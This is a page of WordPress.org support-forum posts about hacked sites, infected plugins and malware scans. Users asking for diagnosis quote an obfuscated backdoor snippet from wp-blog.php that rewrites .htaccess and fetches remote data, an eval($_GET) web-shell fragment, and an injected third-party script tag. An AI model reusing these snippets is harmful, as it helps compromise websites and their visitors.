Channel: Topic Tag: malware | WordPress.org

Malware scan

Hello,

my hosting provider sent me a message and blocked the site:

The following file was blocked because of malware/attacks in order to protect the systems:
XXXX/wp-content/plugins/offen/templates/widget/style5.php


Having to reset permalinks due to 404 errors multiple times a day

Hey folks, hoping y’all might have some ideas on how to fix this. I had someone attack my website with a phished login back in December and post a phishing page. I deleted all the pages and malware by hand, and reset all passwords. No security issues since then. However, ever since then, my blog posts and pages have been breaking multiple times a day with the error

“Not Found
The requested URL /blog/ was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”

Resetting my permalinks fixes the problem, however it keeps occurring, sometimes multiple times a day. I’ve tried disabling all of my plugins and reverting my theme back to default 2019, that doesn’t work. I also tried resetting my .htaccess file, that also didn’t fix it.

My current .htaccess file is:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# Use PHP70 as default
AddHandler application/x-httpd-php70 .php
<IfModule mod_suphp.c>
suPHP_ConfigPath /opt/php70/lib
</IfModule>

I’m currently running WordPress 5.3.2 with the Flatsome theme.

Help please! Pulling my hair out at this point!

Security Question: Why am I getting so much suspicious traffic?

Hello,

My Wordfence security plugin shows that there are IPs blocked from all over the world. I have GoDaddy, and multiple WordPress sites on one host. Some sites have multiple IP blocks per day, while others 1 every couple of days.

The IPs usually either go for /wp-login.php, or /xmlrpc.php. Wordfence lists them as Human, and sometimes bot.

Is all of this normal? Does everyone get bombarded by malicious traffic, or what is this?
If I transfer my WordPress sites to a new host, or to wordpress.com, would these “attacks” continue? Or is my hosting somehow compromised?

I don’t really know much about security, so any info would be of great help!

Thank you for reading.

Strange file

I noticed a strange file in my managed WordPress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:

@ini_set('display_errors', '0');
error_reporting(0);
$track = 'avt';
if (isset($_REQUEST['check'])) {
	$htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress';
if (file_put_contents('.htaccess', $htaccess)) {
	touch('.htaccess', $actime);
	touch('wp-blog.php', $actime);
	echo 'ok';
}
exit;
}

if (is_dir("wp-includes/Text/Diff/p")) {
	$dir = "wp-includes/Text/Diff/p";
}
else $dir = "wp-content/uploads/wp";

$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];

$redirect = 0;
$fof = '404 not found';

function getRealIpAddr() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
      $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else {
      $ip=$_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];

if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;

$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);
$ao = 'wp_ccd';
$ee = $ea.$ae;
$oa = str_replace('sx', '64', $ee);
$genpass = "xxx+xxx";
$tdpass = "xxxx";

if (ini_get('allow_url_fopen')) {
    function get_data_ya($mmm) {
        $data = file_get_contents($mmm);
        return $data;
    }
}

There’s more, but this part looks like it’s doing something suspicious.

I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.

One of a kind and safest life saver wordpress security

Million stars to the maker of this plugin. I recommend the whole world to use this plugin

Malware Found on Custom-admin-interface.php

Dear all
my provider has notified me that in the code below there’s a malware.

/plugins/wp-custom-admin-interface/wp-custom-admin-interface.php

{HEX}Malware.Expert.generic.eval.base64.decode.41.UNOFFICIAL FOUND

Website hacked thanks to the poor code of this plugin

Website hacked thanks to the poor code of this plugin

Avoid this plugin at all costs if you don’t want your website to be hacked

Malware because of InfiniteWP Client

Hi,

The communication of the security issue arrived too late for me. No mail or whatsoever. One of my clients had to notify me. Quite awkward.

I have a couple of infected websites all on 1 server. Each time when I clean them up they get infected again within a couple of hours. Removing the malicious codes doesn’t seem to be enough. I’m missing some spots. But I have no idea where.

Why don’t you have any solution shared with us?! Can you give me a manual for how to clean up my websites/server?

Thanks!


Can’t update from 5.3.10

Hi,

I’m having issues trying to update this plugin from 5.3.10 to 5.3.13.

The Plugin page prompts me that this plugin has an update, although each time I click “update now” it proceeds as normal and starts to update although once I refresh the page, it prompts me to update again. I’ve tried it 4 times now.

Any ideas? The admin-ajax.php isn’t throwing any errors, although it keeps trying to update to 5.3.10 which is rather strange.

{"success":true,"data":{"update":"plugin","slug":"miniorange-2-factor-authentication","oldVersion":"Version 5.3.10","newVersion":"Version 5.3.10","plugin":"miniorange-2-factor-authentication\/miniorange_2_factor_settings.php","pluginName":"miniOrange 2 Factor Authentication"}}

chr() expects parameter 1 to be int, string given

chr() expects parameter 1 to be int, string given 1 +
wp-content/plugins/wp-security-pro/handler/login.php:62

Getting this PHP Notice when I activate the plugin.

Infected With Malicious Redirect Malware

I’m helping my friend, with his new website.

As victims of daily bruteforce (before we had Cloudflare firewall rules), his WP credentials were breached. Our WordPress was up-to-date but our PHP was not at the time.

The bot created new ‘pages’ that cannot be seen in the WordPress dashboard.
I accidentally ran across it via Googling: site:hypelist.ca
Check now and you will see it’s littered with Italian spam redirects from pages shown as 404 errors (according to https://sitecheck.sucuri.net/)
Disregard the ‘other’ malware (rogueads.unwanted.ads). They’re scripts from an ad network.

I’ve located some of the malware. In my root directory, I have a folder
called: postnew (last modified 1969-12-31 lol)

postnew contains:
1. idlogs.txt
2. index.php
3. moban.html

When I delete this file, it appears again after a few minutes.

.htaccess: Our .htaccess file appears compromised as well because of the Rewrite rules that are directed to postnew/index.php

Once again, when I delete the rewrite rules related to the above, they appear again.
I’ve even deleted the .htaccess file and created a new one via the WordPress dashboard, no luck.

XML-RPC seems normal, but is it supposed to include: http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html near the top?

I’ve deleted a few plugins I thought could be an issue. Persists.
I’ve searched wp-includes, but it would take forever to potentially find anything.

When I deleted the postnew folder, my wp-admin page broke. Looks like this
When I use /wp-login.php it looks fine; upon successful login, it leads to the broken /wp-admin page.

I know some may suggest backup and reinstall WordPress. I’ve heard others online still had the issue after a clean install.

My friend attracted the malware, but I played around and broke the site even further.

Any help would be appreciated.

Note: I do not have access to the WordPress dashboard. Only cPanel, FTP & Cloudflare.
I will try to respond ASAP to move this along quickly.

Thanks in advance and for your time.

Malware found ioptimize.php

Hello Folks,

We have found a malicious plugin on several WordPress sites on several webhosts.
The plugin is called ioptimization, and would allow file uploads when opened directly (/wp-content/plugins/ioptimization/IOptimize.php). Luckily Wordfence is blocking this in our cases.
It does not seem to be because of another plugin, as websites with different plugins had this infection and on different servers, so I’m afraid this is a WordPress Core exploit.
This malicious plugin appeared 4 days ago (8 Feb), all around the same time.
So far, the damage has been minimal, but it’s more worrying this appeared in our sites in the first place.
I hope I posted this in the right place.

[malware code removed]

Hope this will be useful to someone

Malicious activity

Hello

I found this link 4 times in my home page source code: <script src="//mikkymax.com/20ba4519da0cfb915b.js" async="" type="text/javascript"></script>. I searched for it in my server code and it doesn’t exist there. When I did some research I found that it is malicious activity.

I used iThemes Security and Wordfence but no malware was detected.

Any help please?

Malicious activity not detected

Hello

I found this link 4 times in my home page source code: <script src="//mikkymax.com/20ba4519da0cfb915b.js" async="" type="text/javascript"></script>. I searched for it in my server code and it doesn’t exist there. When I did some research I found that it is malicious activity.

I used Wordfence but no malware was detected.

Any help please?

Unable to load/edit using Elementor

Hi. We’ve just installed the 14-day trial Security by CleanTalk plugin, and we can’t seem to be able to edit my pages using Elementor.

Furthermore, 3 of our Elementor-based pages have been flagged as “Frontend malware”: https://family.org.my/?page_id=2098, https://family.org.my/?page_id=4481, https://family.org.my/?page_id=7191.

As a result, we have disabled the plugin so we’re able to continue our work.

Appreciate your help to resolve this.


Once installed, it cannot be stopped or uninstalled

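It is really just a wp-proxy carrying traffic-driving ads, and once installed it cannot be stopped or uninstalled.

I don’t know whether this is a bug or whether the author did it on purpose.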

WordPress installation redirects to ad/spam page

When you visit my site, unless you type the http:// it redirects to some spam site. I have used WordFence and scanned the site and installation, and it still does this. Suggestions? Help... TIA

MALWARE INFECTED PLUGIN

My site got infected with malware through Content Views and Content Views Pro. It took me 3 days to fix my WordPress, now whenever I activate CVP my site breaks immediately.

This is the result of the malware scan:

----------- SCAN SUMMARY -----------
Known viruses: 2091091
Engine version: devel-clamav-0.99-beta1-632-g8a582c7
Scanned directories: 5615
Scanned files: 39596
Infected files: 19
Data scanned: 846.52 MB
Data read: 2107.50 MB (ratio 0.40:1)
Time: 899.292 sec (14 m 59 s)

----------- SCAN SUMMARY -----------
Known viruses: 2091091
Engine version: devel-clamav-0.99-beta1-632-g8a582c7
Scanned directories: 0
Scanned files: 0
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 6.058 sec (0 m 6 s)

----------- SCAN SUMMARY -----------
Known viruses: 2091091
Engine version: devel-clamav-0.99-beta1-632-g8a582c7
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 5.746 sec (0 m 5 s)

Still have malware

Hello, I have 3 websites in my home directory and I run a full scan for https://myoffice-hub.com but https://sitecheck.sucuri.net/results/https/myoffice-hub.com says still have problems in my website.
And https://transparencyreport.google.com/safe-browsing/search?url=https:%2F%2Fmyoffice-hub.com says ‘No unsafe content found’. I am confused about different reports.
Can you please suggest me how to solve those errors?

Thanks
Gaurav Singh

Malicious(?) code in plugin-generated php files

Hi,

I had some potentially malicious code in files like this(name changed):

wp-content/cache/supercache/www.example.org/meta-wp-cache-www.example.org12ef834fsaf32r23f43gsdf95.php

here is the sample:

@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(

@donncha has written some time ago that these PHP files are generated off the website. What kind of requests are they generated from? Are they error logs generated from debugging tab – there is a link to non-existing php file with hashed name?

I looked into other files and database and they seem clean. Is it possible that the plugin has cached a malicious request?
